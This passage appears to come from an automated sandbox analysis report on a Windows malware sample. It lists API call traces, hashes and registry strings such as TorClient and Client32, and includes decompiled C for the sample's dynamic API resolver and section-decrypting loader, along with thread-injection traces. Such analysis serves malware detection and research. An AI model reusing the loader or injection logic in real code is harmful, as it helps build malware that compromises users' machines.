SleepEx.KERNEL32(00000064,00000001), ref: 00401512
CloseHandle.KERNEL32 ref: 0040152E
HeapDestroy.KERNEL32 ref: 0040153A

Memory Dump Source

Source File: 00000001.00000002.448591330.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.448578715.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.448616383.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.448636811.0000000000405000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.448653832.0000000000406000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateHeapInterlocked$CloseDecrementDestroyHandleIncrementSleepThread
String ID:
API String ID: 3416589138-0
Opcode ID: e7241168a89c29bb175ccad97d48b90394156123f0291c78954156b0d4cd7123
Instruction ID: 30722247f0fe59aceb3574362eeb40f81c784e264e3bb32c79b2a1d3567005d1
Opcode Fuzzy Hash: e7241168a89c29bb175ccad97d48b90394156123f0291c78954156b0d4cd7123
Instruction Fuzzy Hash: FD21AAB1601114BBC7109F59ED88A6A7BA8F7D1755710413AF602FB2F0D7788E40CB5C

Uniqueness

Uniqueness Score: -1.00%

Function 02B8E866, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 68registryCOMMON

Download Yara Rule

APIs

Part of subcall function 02B86AB9: lstrlen.KERNEL32(?,00000000,02B8EC1E,00000027,02B9E0D4,?,00000000,?,?,02B8EC1E,Local\,00000001,?,02B90C37,00000000,00000000), ref: 02B86AEF
Part of subcall function 02B86AB9: lstrcpy.KERNEL32(00000000,00000000), ref: 02B86B13
Part of subcall function 02B86AB9: lstrcat.KERNEL32(00000000,00000000), ref: 02B86B1B

RegOpenKeyExA.KERNELBASE(02B84F98,00000000,00000000,00020119,80000001,00000000,Software\AppDataLow\Software\Microsoft\,00000000,?,02B9E130,02B84F98,02B815E7,80000001,?,02B815E7), ref: 02B8E89F
RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,?,02B815E7), ref: 02B8E8B3
RegCloseKey.KERNELBASE(?,?,Client32,?,?,?,02B815E7), ref: 02B8E8FC

Strings

Client32, xrefs: 02B8E8C1
Client64, xrefs: 02B8E8E5
Software\AppDataLow\Software\Microsoft\, xrefs: 02B8E874

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Open$Closelstrcatlstrcpylstrlen
String ID: Client32$Client64$Software\AppDataLow\Software\Microsoft\
API String ID: 4131162436-710576342
Opcode ID: 94dc84b92d12ca11215fb345d9175d399ffca0e202fe4e4033360a0bf6338f06
Instruction ID: e09d41c975b2a42435cf563b84ccfb20868d50fc1d1a530ea339e2658b03ea57
Opcode Fuzzy Hash: 94dc84b92d12ca11215fb345d9175d399ffca0e202fe4e4033360a0bf6338f06
Instruction Fuzzy Hash: 0411607194021DBEEB10AFD5DD85CAEBBBDEF45254B1044B6FA14A6110D370AE14DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B70305, Relevance: 9.9, APIs: 4, Strings: 1, Instructions: 1122memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02B95277: VirtualProtect.KERNELBASE(?,00000000,00000040,00000004,00000000,?,00000000,00000000,?,?,02B7619F,00000004,00000000,?,00000000,02B7B275), ref: 02B9529C
Part of subcall function 02B95277: GetLastError.KERNEL32(?,00000000,00000000,?,?,02B7619F,00000004,00000000,?,00000000,02B7B275,?,?), ref: 02B952A4
Part of subcall function 02B95277: VirtualQuery.KERNEL32(?,00000000,0000001C,?,00000000,00000000,?,?,02B7619F,00000004,00000000,?,00000000,02B7B275,?,?), ref: 02B952BB
Part of subcall function 02B95277: VirtualProtect.KERNEL32(?,00000000,-392CC87E,00000004,?,00000000,00000000,?,?,02B7619F,00000004,00000000,?,00000000,02B7B275,?), ref: 02B952E0

GetLastError.KERNEL32(00000000,00000004,02B9D518,00000000,?,00000000,00000002,02B9A568,0000001C,02B85176,00000002,?,00000001,00000000,02B9D514,00000000), ref: 02B71159

Part of subcall function 02B924E0: lstrlen.KERNEL32(6AD68BFC,02B7619F,?,02B7619F,00000004), ref: 02B92518
Part of subcall function 02B924E0: lstrcpy.KERNEL32(00000000,6AD68BFC), ref: 02B9252F
Part of subcall function 02B924E0: StrChrA.SHLWAPI(00000000,0000002E,?,02B7619F,00000004), ref: 02B92538
Part of subcall function 02B924E0: GetModuleHandleA.KERNEL32(00000000,?,02B7619F,00000004), ref: 02B92556

VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,00000000,00000005,?,00000000,6AD68BFC,?,00000004,00000000,00000004,02B9D518,00000000,?), ref: 02B710D7
VirtualProtect.KERNELBASE(00000000,00000004,02B9D518,02B9D518,?,00000004,00000000,00000004,02B9D518,00000000,?,00000000,00000002,02B9A568,0000001C,02B85176), ref: 02B710F2
RtlEnterCriticalSection.NTDLL(02B9E240), ref: 02B71116
RtlLeaveCriticalSection.NTDLL(02B9E240), ref: 02B71134

Part of subcall function 02B95277: SetLastError.KERNEL32(00000000,?,00000000,00000000,?,?,02B7619F,00000004,00000000,?,00000000,02B7B275,?,?), ref: 02B952E9

Strings

, xrefs: 02B710C6

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Virtual$Protect$ErrorLast$CriticalSection$EnterHandleLeaveModuleQuerylstrcpylstrlen
String ID:
API String ID: 899430048-3916222277
Opcode ID: 1621596f4ba0eb80db992775595fb174d33e6b9b8d078ea0bb68ae0188944924
Instruction ID: 44bacdfb3929de9df4af27e556b991915bdbf47c077cdf14ac53734459c101da
Opcode Fuzzy Hash: 1621596f4ba0eb80db992775595fb174d33e6b9b8d078ea0bb68ae0188944924
Instruction Fuzzy Hash: C0418171900615EFDB11DF69C944A9DFBF9FF09310F14829AE969AB290D730E950CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B818D2, Relevance: 9.1, APIs: 6, Instructions: 125threadsynchronizationinjectionCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 02B818F5

Part of subcall function 02B833D3: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,02B74655,00000000), ref: 02B833EE
Part of subcall function 02B833D3: IsWow64Process.KERNEL32(?,?,?,?,?,?,02B74655,00000000), ref: 02B833FF
Part of subcall function 02B833D3: FindCloseChangeNotification.KERNELBASE(?,?,?,?,02B74655,00000000), ref: 02B83412

ResumeThread.KERNEL32(00000004,?,00000000,CCCCFEEB,?,00000000,00000000,00000004,?,00000000,00000000,76D24EE0,00000000), ref: 02B819AF
WaitForSingleObject.KERNEL32(00000064), ref: 02B819BD
SuspendThread.KERNEL32(00000004), ref: 02B819D0

Part of subcall function 02B87579: memset.NTDLL ref: 02B8783B

ResumeThread.KERNELBASE(00000004), ref: 02B81A53

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Thread$ProcessResumememset$ChangeCloseFindNotificationObjectOpenSingleSuspendWaitWow64
String ID:
API String ID: 2336522172-0
Opcode ID: 63f5d3bb4cbb353511ee3e1364d00ab725a33f74c9f7f1b2252e304367bfe4b6
Instruction ID: bb0964154b323506fe7e91219658910f33c0889f4e83cf1a5145a90bb238ccfa
Opcode Fuzzy Hash: 63f5d3bb4cbb353511ee3e1364d00ab725a33f74c9f7f1b2252e304367bfe4b6
Instruction Fuzzy Hash: 4D418C71901209EFDF11AF98CD84AAE7BBAEF04384F1444A5E92DA7150D731DA92CF60

Uniqueness

Uniqueness Score: -1.00%

Function 02B7FFED, Relevance: 9.1, APIs: 6, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,02B9D514,?,02B9A578,00000018,02B83B8C,00000000,00000002,02B9D518,00000000,02B9D514,00000000), ref: 02B80030
VirtualProtect.KERNELBASE(00000000,00000004,?,?,00000000,00000004,?,00000000,?,?,?,02B9D514,?,02B9A578,00000018,02B83B8C), ref: 02B800BB
RtlEnterCriticalSection.NTDLL(02B9E240), ref: 02B800E3
RtlLeaveCriticalSection.NTDLL(02B9E240), ref: 02B80101

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
String ID:
API String ID: 3666628472-0
Opcode ID: 510576bb1c463acd281952458fb53a493082577028fc21e0827d4783238fe5d8
Instruction ID: b4ea0c0d58d10961d044d8103bb1e7041c04f8c950bba02ddd6717da518da678
Opcode Fuzzy Hash: 510576bb1c463acd281952458fb53a493082577028fc21e0827d4783238fe5d8
Instruction Fuzzy Hash: 9D419670900609EFCB11FF65C940AAEBBF5FF48390B0089AAE519E7260D770D994CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00401314, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401314(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t32;
				_Unknown_base(*)()* _t35;
				_Unknown_base(*)()* _t38;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E00401BD2(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t48 = GetModuleHandleA( *0x404150 + 0x405014);
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48,  *0x404150 + 0x4050dc);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E004019CF(_t54);
					} else {
						_t32 = GetProcAddress(_t48,  *0x404150 + 0x4050ec);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t35 = GetProcAddress(_t48,  *0x404150 + 0x4050ff);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t38 = GetProcAddress(_t48,  *0x404150 + 0x405114);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t41 = GetProcAddress(_t48,  *0x404150 + 0x40512a);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E00401C22(_t54, _a8); // executed
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x00401323
0x00401327
0x004013e9
0x0040132d
0x00401345
0x00401354
0x0040135b
0x0040135f
0x00401362
0x004013e1
0x004013e2
0x00401364
0x00401371
0x00401375
0x00401378
0x00000000
0x0040137a
0x00401387
0x0040138b
0x0040138e
0x00000000
0x00401390
0x0040139d
0x004013a1
0x004013a4
0x00000000
0x004013a6
0x004013b3
0x004013b7
0x004013ba
0x00000000
0x004013bc
0x004013c2
0x004013c7
0x004013ce
0x004013d5
0x004013d8
0x00000000
0x004013da
0x004013dd
0x004013dd
0x004013d8
0x004013ba
0x004013a4
0x0040138e
0x00401378
0x00401362
0x004013f7

APIs

Part of subcall function 00401BD2: HeapAlloc.KERNEL32(00000000,?,00401FD0,?,00000000,00000000,?,00401069), ref: 00401BDE

GetModuleHandleA.KERNEL32(?,00000020,00000002,0000000A,?,?,?,?,0040127C,?,?,?,00000002,?,?,?), ref: 00401339
GetProcAddress.KERNEL32(00000000,?), ref: 0040135B
GetProcAddress.KERNEL32(00000000,?), ref: 00401371
GetProcAddress.KERNEL32(00000000,?), ref: 00401387
GetProcAddress.KERNEL32(00000000,?), ref: 0040139D
GetProcAddress.KERNEL32(00000000,?), ref: 004013B3

Part of subcall function 00401C22: NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,76D24EE0,00000000,00000000,00000002), ref: 00401C7F
Part of subcall function 00401C22: memset.NTDLL ref: 00401CA1

Memory Dump Source

Source File: 00000001.00000002.448591330.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.448578715.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.448616383.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.448636811.0000000000405000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.448653832.0000000000406000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: db92086ee0752e12de6372fcbb26472a999ac9afe1b89aa56b4e28553a4da81e
Instruction ID: 7c1066042745ad38687782103b68cf00901da7ab1273cb884b239f245e57213f
Opcode Fuzzy Hash: db92086ee0752e12de6372fcbb26472a999ac9afe1b89aa56b4e28553a4da81e
Instruction Fuzzy Hash: 9D213EB1500306DFE710DFA9D988E6B77ECEF483447004076F905EB6A1E634E901CB68

Uniqueness

Uniqueness Score: -1.00%

Function 02B8C0AB, Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,00000000,?,00000000,02B7402D), ref: 02B8C0C2
QueueUserAPC.KERNELBASE(?,00000000,?,?,?,02B958C6,?,?,?,?,?,02B720D2,?), ref: 02B8C0D7
GetLastError.KERNEL32(00000000,?,?,02B958C6,?,?,?,?,?,02B720D2,?), ref: 02B8C0E2
TerminateThread.KERNEL32(00000000,00000000,?,?,02B958C6,?,?,?,?,?,02B720D2,?), ref: 02B8C0EC
CloseHandle.KERNEL32(00000000,?,?,02B958C6,?,?,?,?,?,02B720D2,?), ref: 02B8C0F3
SetLastError.KERNEL32(00000000,?,?,02B958C6,?,?,?,?,?,02B720D2,?), ref: 02B8C0FC

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: c3ddf6a9924803c6ef15dc702d86c1fb0c726b6234f935fcf36884799c5bbf1a
Instruction ID: e49b811698b9dd2ac058805bf054463ba812e90f3becf0e97383bf77d2f749d7
Opcode Fuzzy Hash: c3ddf6a9924803c6ef15dc702d86c1fb0c726b6234f935fcf36884799c5bbf1a
Instruction Fuzzy Hash: 0EF08232981620BBC3626B61AE49F5B7F69FB0A7A1F004D01F70992150C7318860DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02B8E65F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

memcpy.NTDLL(02B9E130,76D24D40,00000018,00000001,00000000,76D24D40,02B87CD1,?,?), ref: 02B8E675
GetModuleHandleA.KERNEL32(NTDLL.DLL,00000001,00000000,76D24D40,02B87CD1,?,?), ref: 02B8E69A
GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 02B8E6AA

Strings

KERNEL32.DLL, xrefs: 02B8E6A5
NTDLL.DLL, xrefs: 02B8E683

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: HandleModule$memcpy
String ID: KERNEL32.DLL$NTDLL.DLL
API String ID: 1864057842-633099880
Opcode ID: 91d71e84398fcf8e8b6fe1ffcf2b32a6cbe285b3a8d4b527b5f1d97495e58e1b
Instruction ID: a3c1d4d2da9242524af5868602237b1cf9f3541b50d458d989c23d9ce36dabf0
Opcode Fuzzy Hash: 91d71e84398fcf8e8b6fe1ffcf2b32a6cbe285b3a8d4b527b5f1d97495e58e1b
Instruction Fuzzy Hash: 5A01CC32A80312ABFB10EF54ED81A26B795EB94754F140ABBF54893091CBB0D498CF52

Uniqueness

Uniqueness Score: -1.00%

Function 02B8672D, Relevance: 7.6, APIs: 5, Instructions: 67registrymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02B7810A: RegCreateKeyA.ADVAPI32(80000001,05AE8900,?), ref: 02B7811F
Part of subcall function 02B7810A: lstrlen.KERNEL32(05AE8900,00000000,00000000,?,?,02B879A9,00000000,?), ref: 02B7814D

RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,02B71CDF,00000000,00000000,?,?,00000000,?,?,?,02B71CDF,TorClient), ref: 02B86765
RtlAllocateHeap.NTDLL(00000000,02B71CDF), ref: 02B86779
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,02B71CDF,?,?,?,02B71CDF,TorClient,?,?), ref: 02B86793
HeapFree.KERNEL32(00000000,02B71CDF,?,?,?,02B71CDF,TorClient,?,?), ref: 02B867AF
RegCloseKey.KERNELBASE(?,?,?,?,02B71CDF,TorClient,?,?), ref: 02B867BD

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: HeapQueryValue$AllocateCloseCreateFreelstrlen
String ID:
API String ID: 1633053242-0
Opcode ID: c18f3df3921bb5b63f1ef6e878488107754eaac4d2e9227108a5db31353f1a80
Instruction ID: d05e1f26e407cc80658cf3f43337d7f330db0066870c4fba04058ca2107663b9
Opcode Fuzzy Hash: c18f3df3921bb5b63f1ef6e878488107754eaac4d2e9227108a5db31353f1a80
Instruction Fuzzy Hash: 3F1128B6900109FFDF01AFA5DD85DAE7BBEFB88294B110866F90593210E7319D61DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B95277, Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,00000000,00000040,00000004,00000000,?,00000000,00000000,?,?,02B7619F,00000004,00000000,?,00000000,02B7B275), ref: 02B9529C
GetLastError.KERNEL32(?,00000000,00000000,?,?,02B7619F,00000004,00000000,?,00000000,02B7B275,?,?), ref: 02B952A4
VirtualQuery.KERNEL32(?,00000000,0000001C,?,00000000,00000000,?,?,02B7619F,00000004,00000000,?,00000000,02B7B275,?,?), ref: 02B952BB
VirtualProtect.KERNEL32(?,00000000,-392CC87E,00000004,?,00000000,00000000,?,?,02B7619F,00000004,00000000,?,00000000,02B7B275,?), ref: 02B952E0
SetLastError.KERNEL32(00000000,?,00000000,00000000,?,?,02B7619F,00000004,00000000,?,00000000,02B7B275,?,?), ref: 02B952E9

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Virtual$ErrorLastProtect$Query
String ID:
API String ID: 148356745-0
Opcode ID: ca38b4ba54b422dfe4445d0fd1b000ae3993fc6870a11dcf19e2eb47455722a2
Instruction ID: 4f0349daf2cd5c52f5926efff32cc8756bb419c26b860695f8aff98a43398734
Opcode Fuzzy Hash: ca38b4ba54b422dfe4445d0fd1b000ae3993fc6870a11dcf19e2eb47455722a2
Instruction Fuzzy Hash: D401483294011AAF9F129FA5DD4089ABBBDFF092947008436F94693160D771D9A4DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B844DC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79registryCOMMON

Download Yara Rule

APIs

Part of subcall function 02B7810A: RegCreateKeyA.ADVAPI32(80000001,05AE8900,?), ref: 02B7811F
Part of subcall function 02B7810A: lstrlen.KERNEL32(05AE8900,00000000,00000000,?,?,02B879A9,00000000,?), ref: 02B7814D

RegQueryValueExA.KERNELBASE(?,Client,00000000,02B720D2,02B9D06C,?,00000001,?,76D7F710,00000000,00000000,02B720D2,?), ref: 02B84527
RegSetValueExA.KERNELBASE(?,Client,00000000,00000003,02B9D06C,00000028), ref: 02B84566
RegCloseKey.KERNELBASE(?), ref: 02B84572

Strings

Client, xrefs: 02B8450E, 02B84520, 02B84562, 02B84591

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Value$CloseCreateQuerylstrlen
String ID: Client
API String ID: 2552977122-3236430179
Opcode ID: d63dd9670deb3afcd15101bf051d175ddf1ce3e42b7ddabe52fd235ad5318b99
Instruction ID: b84fbe93b6e1b4980acb93fec725748df8681630cd9d8f13293e5c0a6cb1f507
Opcode Fuzzy Hash: d63dd9670deb3afcd15101bf051d175ddf1ce3e42b7ddabe52fd235ad5318b99
Instruction Fuzzy Hash: 5C217F71D8020AEFDB10FF96DD14BAE7BF8EB04794F4045A6E608A7141D3719A51CF60

Uniqueness

Uniqueness Score: -1.00%

Function 02B7F792, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56registryCOMMON

Download Yara Rule

APIs

Part of subcall function 02B87854: lstrlenW.KERNEL32(004F0053,System,00000000,00000000,?,?,02B7F7B7,004F0053,00000000), ref: 02B87860
Part of subcall function 02B87854: memcpy.NTDLL(00000000,004F0053,00000000,00000002,?,?,02B7F7B7,004F0053,00000000), ref: 02B87888
Part of subcall function 02B87854: memset.NTDLL ref: 02B8789A

RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,?,006E0049,System,004F0053,00000000), ref: 02B7F7E8
RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,00000000,00000004), ref: 02B7F804
RegCloseKey.KERNELBASE(?), ref: 02B7F815

Strings

System, xrefs: 02B7F7C8

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: CloseOpenQueryValuelstrlenmemcpymemset
String ID: System
API String ID: 830012212-3470857405
Opcode ID: ddffc78dd1693148e1e3436b82a60ed3903e15c9533766faaa36f62da4f92ea4
Instruction ID: 6cb28727a1f8a36cf15f042f9864ead3676b2859d7ac3e2031f3e49ee2703029
Opcode Fuzzy Hash: ddffc78dd1693148e1e3436b82a60ed3903e15c9533766faaa36f62da4f92ea4
Instruction Fuzzy Hash: 71113072900209BFDB00EBA5DD85FAEB7BDEB04344F2044A9E618E7140EB70E614CB24

Uniqueness

Uniqueness Score: -1.00%

Function 02B7DBF0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55registryCOMMON

Download Yara Rule

APIs

Part of subcall function 02B7810A: RegCreateKeyA.ADVAPI32(80000001,05AE8900,?), ref: 02B7811F
Part of subcall function 02B7810A: lstrlen.KERNEL32(05AE8900,00000000,00000000,?,?,02B879A9,00000000,?), ref: 02B7814D

RegQueryValueExA.KERNELBASE(?,System,00000000,?,?,?,00000001,?,76D7F710,00000000,?,?,?,02B720D2,?), ref: 02B7DC2E
RegSetValueExA.KERNELBASE(?,System,00000000,00000003,?,00000010,?,?,?,02B720D2,?), ref: 02B7DC60
RegCloseKey.ADVAPI32(?,?,?,?,02B720D2,?), ref: 02B7DC82

Strings

System, xrefs: 02B7DC1E, 02B7DC23, 02B7DC5C

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Value$CloseCreateQuerylstrlen
String ID: System
API String ID: 2552977122-3470857405
Opcode ID: 7918c830053a08f1fc5b0f241269f1ff9a35e73be88b384aff170b80f6859b2a
Instruction ID: b4f7e2a1e8ad5dacc123c9c6f57b7ae90bf517a0ff71a0629a2230d5d66e492a
Opcode Fuzzy Hash: 7918c830053a08f1fc5b0f241269f1ff9a35e73be88b384aff170b80f6859b2a
Instruction Fuzzy Hash: 55113A71E40119FAEF10EBA1CD05BEEBBB8EF48790F1044A6E914A3190E7B09A44DB60

Uniqueness

Uniqueness Score: -1.00%

Function 02B71300, Relevance: 6.1, APIs: 4, Instructions: 110threadsynchronizationinjectionCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 02B7132E
ResumeThread.KERNELBASE(?,?,?,?,?,00000004,?), ref: 02B713B8
WaitForSingleObject.KERNEL32(00000064,?,?,?,?,00000004,?), ref: 02B713C6
SuspendThread.KERNELBASE(?,?,?,?,?,00000004,?), ref: 02B713D9

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Thread$ObjectResumeSingleSuspendWaitmemset
String ID:
API String ID: 3168247402-0
Opcode ID: 5bfbbffd4e4752e8bfb3bae55933647a7a588312a54aad8ff4a6e5db73d6b414
Instruction ID: e5db5c6bc5a9165301a8eedb808574e072e0408f4eaa5a8424ce1f9d7be39e79
Opcode Fuzzy Hash: 5bfbbffd4e4752e8bfb3bae55933647a7a588312a54aad8ff4a6e5db73d6b414
Instruction Fuzzy Hash: CD415E71104301AFEB21EF58C841E6BBBEAFF88354F04492DFAA892160D731D954CF66

Uniqueness

Uniqueness Score: -1.00%

Function 004018B4, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E004018B4(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				unsigned int _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v44;
				signed int _v48;
				intOrPtr _t39;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				signed int _t59;
				signed int _t61;
				intOrPtr _t66;
				intOrPtr _t77;
				void* _t78;
				signed int _t80;

				_t77 =  *0x404130;
				_t39 = E00401568(_t77,  &_v20,  &_v12);
				_v16 = _t39;
				if(_t39 == 0) {
					asm("sbb ebx, ebx");
					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
					_t78 = _t77 + _v20;
					_v36 = _t78;
					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
					_v24 = _t46;
					if(_t46 == 0) {
						_v16 = 8;
					} else {
						_t61 = 0;
						if(_t59 <= 0) {
							_t47 =  *0x40414c;
						} else {
							_t66 = _a4;
							_t50 = _t46 - _t78;
							_t11 = _t66 + 0x405132; // 0x405132
							_v28 = _t50;
							_v32 = _t50 + _t11;
							_v8 = _t78;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t19 = _t61 + 1; // 0x2
								_t80 = _t19;
								E004015C2(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
								_t64 = _v32;
								_v8 = _v8 + 0x1000;
								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
								_t61 = _t80;
								 *0x40414c = _t47;
								if(_t61 >= _t59) {
									break;
								}
								_t50 = _v28;
							}
						}
						if(_t47 != 0x63699bc3) {
							_v16 = 0xc;
						} else {
							memcpy(_v36, _v24, _v12);
						}
						VirtualFree(_v24, 0, 0x8000); // executed
					}
				}
				return _v16;
			}

0x004018bb
0x004018cb
0x004018d2
0x004018d5
0x004018ea
0x004018f1
0x004018f6
0x00401907
0x0040190a
0x00401912
0x00401915
0x004019bf
0x0040191b
0x0040191b
0x0040191f
0x00401987
0x00401921
0x00401921
0x00401924
0x00401926
0x0040192e
0x00401931
0x00401934
0x0040193c
0x00401944
0x00401945
0x00401946
0x0040194d
0x0040194d
0x00401961
0x00401966
0x0040196f
0x00401976
0x00401979
0x0040197d
0x00401982
0x00000000
0x00000000
0x00401939
0x00401939
0x00401984
0x00401991
0x004019a6
0x00401993
0x0040199c
0x004019a1
0x004019b7
0x004019b7
0x004019c6
0x004019cc

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,00000000,?,00000000,?,?,?,?,?,?,00401045,00000000), ref: 0040190A
memcpy.NTDLL(?,00401045,?,?,00000000,?,00000000,?,?,?,?,?,?,00401045,00000000), ref: 0040199C
VirtualFree.KERNELBASE(00401045,00000000,00008000,?,00000000,?,00000000,?,?,?,?,?,?,00401045,00000000), ref: 004019B7

Strings

Dec 21 2020, xrefs: 0040193C

Memory Dump Source

Source File: 00000001.00000002.448591330.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.448578715.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.448616383.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.448636811.0000000000405000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.448653832.0000000000406000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Dec 21 2020
API String ID: 4010158826-582694290
Opcode ID: 95ed0145c062206b0523f860262e71bdd37820713c381823cf12dfbeab2c5bf5
Instruction ID: 11d7948f9997cf789edb6565ea52870f20f18b186b7309de2ed48f3d70b22aaa
Opcode Fuzzy Hash: 95ed0145c062206b0523f860262e71bdd37820713c381823cf12dfbeab2c5bf5
Instruction Fuzzy Hash: D63153B1E00119AFCF00CF99C891A9EBBB5AF48304F10813AE505BB295D7759A45CF98

Uniqueness

Uniqueness Score: -1.00%

Function 02B78CA2, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?), ref: 02B78CF4
memcpy.NTDLL(?,?,?,?,?,?), ref: 02B78D85
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 02B78DA0

Strings

Dec 21 2020, xrefs: 02B78D15

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Virtual$AllocFreememcpy
